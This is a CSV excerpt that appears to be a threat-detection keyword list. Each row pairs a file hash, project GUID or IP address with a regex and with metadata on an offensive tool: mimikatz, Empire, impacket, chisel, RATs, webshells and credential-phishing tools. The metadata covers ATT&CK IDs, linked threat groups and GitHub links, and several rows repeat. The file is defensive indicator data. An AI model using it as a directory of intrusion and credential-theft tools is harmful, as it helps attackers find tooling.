"*102083f916b833362439518408fa1e5f98a21ed600ed51ec19219d6f3fc92f21*",".{0,1000}102083f916b833362439518408fa1e5f98a21ed600ed51ec19219d6f3fc92f21.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","21877"
"*10226b3b8594c981077a5e415bd98787c94b6f3f2ca48a50089fdf3f2c2547e8*",".{0,1000}10226b3b8594c981077a5e415bd98787c94b6f3f2ca48a50089fdf3f2c2547e8.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","21878"
"*10244cbbce7a1608b471e26612dbc9ed658d4dde66f5075d6becb5834df8af8b*",".{0,1000}10244cbbce7a1608b471e26612dbc9ed658d4dde66f5075d6becb5834df8af8b.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","21879"
"*1027943da338f85a1aff09bb1825e4d4fe2579256cec951becbb5cebd5c60b72*",".{0,1000}1027943da338f85a1aff09bb1825e4d4fe2579256cec951becbb5cebd5c60b72.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21880"
"*1027943da338f85a1aff09bb1825e4d4fe2579256cec951becbb5cebd5c60b72*",".{0,1000}1027943da338f85a1aff09bb1825e4d4fe2579256cec951becbb5cebd5c60b72.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21881"
"*1029c62bf37caa9d15ae9a74c931cb9246d5c3ce33be94a0eb8e282b6249c9d8*",".{0,1000}1029c62bf37caa9d15ae9a74c931cb9246d5c3ce33be94a0eb8e282b6249c9d8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21882"
"*104.131.124.203*",".{0,1000}104\.131\.124\.203.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","1","#ipaddress","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","21884"
"*104e9d143fbe807efa94f576f0c400b222fbc6a76f64bc4764fb64abf154e7ff*",".{0,1000}104e9d143fbe807efa94f576f0c400b222fbc6a76f64bc4764fb64abf154e7ff.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","21885"
"*1052d287bcc95797530ef9961bfb9d1af1c3419f302a65b4fac5cb32af3b813c*",".{0,1000}1052d287bcc95797530ef9961bfb9d1af1c3419f302a65b4fac5cb32af3b813c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21886"
"*105C2C6D-1C0A-4535-A231-80E355EFB112*",".{0,1000}105C2C6D\-1C0A\-4535\-A231\-80E355EFB112.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","0","#GUIDproject","N/A","10","10","1081","131","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z","21888"
"*106c6250321d09ba9fef27ccd9506234f00e00c23c6b1c7bc0541d42e96bfc25*",".{0,1000}106c6250321d09ba9fef27ccd9506234f00e00c23c6b1c7bc0541d42e96bfc25.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21892"
"*107206c062bac57f47d5dc16f65dfe22a709e375c537139da65bc52c014110d5*",".{0,1000}107206c062bac57f47d5dc16f65dfe22a709e375c537139da65bc52c014110d5.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21893"
"*10755f01684f2dfa48f5f096748c00ee21c272a8f1a558b021dc9a8298f3cc25*",".{0,1000}10755f01684f2dfa48f5f096748c00ee21c272a8f1a558b021dc9a8298f3cc25.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","#filehash","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","21894"
"*107EBC1B-0273-4B3D-B676-DE64B7F52B33*",".{0,1000}107EBC1B\-0273\-4B3D\-B676\-DE64B7F52B33.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","#GUIDproject","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","21897"
"*10804539a495e0fcc79a6c2ab03e34d4b5c2bce1e134060839ff9b58dcfc1cf7*",".{0,1000}10804539a495e0fcc79a6c2ab03e34d4b5c2bce1e134060839ff9b58dcfc1cf7.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#filehash","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","21899"
"*108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a*",".{0,1000}108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","21900"
"*1083596da1857862551870eb6fd06c26bdd2cac7698b27034f6cc8d773a3664b*",".{0,1000}1083596da1857862551870eb6fd06c26bdd2cac7698b27034f6cc8d773a3664b.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","21901"
"*1085654ad66ba105edeca8e068047afdcec8f3d35aaa2dc09cf5cb5518971e15*",".{0,1000}1085654ad66ba105edeca8e068047afdcec8f3d35aaa2dc09cf5cb5518971e15.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","21903"
"*1088033e8d7f6952244ca7ef7fa941d94ec1790974573b4c50b905514b1bc15c*",".{0,1000}1088033e8d7f6952244ca7ef7fa941d94ec1790974573b4c50b905514b1bc15c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21904"
"*108f698dfd91153a0747d48513546fd9cda7dc55c992a4686692c13af339f686*",".{0,1000}108f698dfd91153a0747d48513546fd9cda7dc55c992a4686692c13af339f686.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","21905"
"*10accf5038dd9a3353d50e63d208c684ddfe8df4d06b33602fada0f44a739039*",".{0,1000}10accf5038dd9a3353d50e63d208c684ddfe8df4d06b33602fada0f44a739039.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","21907"
"*10b3addcd8d4ac13a05391a939b334d0a2f7586e34be79c3a89812c958cc7a5c*",".{0,1000}10b3addcd8d4ac13a05391a939b334d0a2f7586e34be79c3a89812c958cc7a5c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21909"
"*10b405045647c01fa0cd316da07236cf1ee0c60675b7ab515734995efe28adcc*",".{0,1000}10b405045647c01fa0cd316da07236cf1ee0c60675b7ab515734995efe28adcc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21911"
"*10c43cc3b33f427e0f720ec63a371dcf41bd25ad3bf69e01f255613b8d16fdc2*",".{0,1000}10c43cc3b33f427e0f720ec63a371dcf41bd25ad3bf69e01f255613b8d16fdc2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21912"
"*10c9d70217e5a3915a6c09feea4110991dae5d9a1b6ae5d32c4d69dd6b6eaf50*",".{0,1000}10c9d70217e5a3915a6c09feea4110991dae5d9a1b6ae5d32c4d69dd6b6eaf50.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","#filehash","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","21914"
"*10CC4D5B-DC87-4AEB-887B-E47367BF656B*",".{0,1000}10CC4D5B\-DC87\-4AEB\-887B\-E47367BF656B.{0,1000}","offensive_tool_keyword","FormThief","Spoofing desktop login applications with WinForms and WPF","T1204.002 - T1056.004 - T1071.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/mlcsec/FormThief","1","0","#GUIDproject","N/A","8","2","173","31","2024-02-19T22:40:09Z","2024-02-19T22:34:07Z","21915"
"*10d06380c1904999c36072f962cfe380fe36488c3bcf1a2f485532de4d5bae5f*",".{0,1000}10d06380c1904999c36072f962cfe380fe36488c3bcf1a2f485532de4d5bae5f.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","21916"
"*10db57856d86b6cef6402c0897efb13cbd5455158f5bfb4497fed570ced9b93c*",".{0,1000}10db57856d86b6cef6402c0897efb13cbd5455158f5bfb4497fed570ced9b93c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21918"
"*10dbc6cb2d71505d7add5a2927228077142851657f2578b9c774656505338d32*",".{0,1000}10dbc6cb2d71505d7add5a2927228077142851657f2578b9c774656505338d32.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","0","#filehash","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","21919"
"*10de4ed7588b4a7e75d01bb69f0b602b0c298a2f9f993a6a8f4e2248031699fb*",".{0,1000}10de4ed7588b4a7e75d01bb69f0b602b0c298a2f9f993a6a8f4e2248031699fb.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","21920"
"*10e8116f55fa82a8b6517d2b8b2534744ef8477891d7999711dfdaf4a2297d4d*",".{0,1000}10e8116f55fa82a8b6517d2b8b2534744ef8477891d7999711dfdaf4a2297d4d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21921"
"*10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab*",".{0,1000}10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21922"
"*10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab*",".{0,1000}10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21923"
"*10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab*",".{0,1000}10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21924"
"*10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab*",".{0,1000}10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21925"
"*10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab*",".{0,1000}10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21926"
"*10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab*",".{0,1000}10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21927"
"*10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab*",".{0,1000}10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21928"
"*10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab*",".{0,1000}10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21929"
"*10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab*",".{0,1000}10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21930"
"*10f310ef3189c07c1581a727a6edcd86c9b650f68c2a933cf7af272bf3acf9e5*",".{0,1000}10f310ef3189c07c1581a727a6edcd86c9b650f68c2a933cf7af272bf3acf9e5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21931"
"*10f86295406d71ec27ef38e6f0f9f4d8ddc14e65a662716de879373ffa7248ec*",".{0,1000}10f86295406d71ec27ef38e6f0f9f4d8ddc14e65a662716de879373ffa7248ec.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#filehash","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","21932"
